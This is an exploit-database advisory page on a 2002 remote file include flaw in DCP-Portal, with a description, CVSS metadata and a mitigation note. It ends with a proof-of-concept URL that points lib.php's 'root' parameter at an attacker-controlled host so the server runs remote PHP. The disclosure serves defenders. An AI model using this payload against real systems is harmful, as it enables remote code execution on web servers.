header-logo
Suggest Exploit
vendor:
DCP-Portal
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: DCP-Portal
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

DCP-Portal Remote File Include Vulnerability

DCP-Portal is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. An attacker may exploit this by supplying a path to a maliciously created file, located on an attacker-controlled host as a value for some parameters. If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. Successful exploitation may provide local access to the attacker.

Mitigation:

Ensure that user-supplied input is properly validated and filtered before being used in a file include statement.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6525/info
 
DCP-Portal is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers.
 
An attacker may exploit this by supplying a path to a maliciously created file, located on an attacker-controlled host as a value for some parameters.
 
If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. Successful exploitation may provide local access to the attacker. 

http://www.example.com/library/lib.php?root=http://attacker.org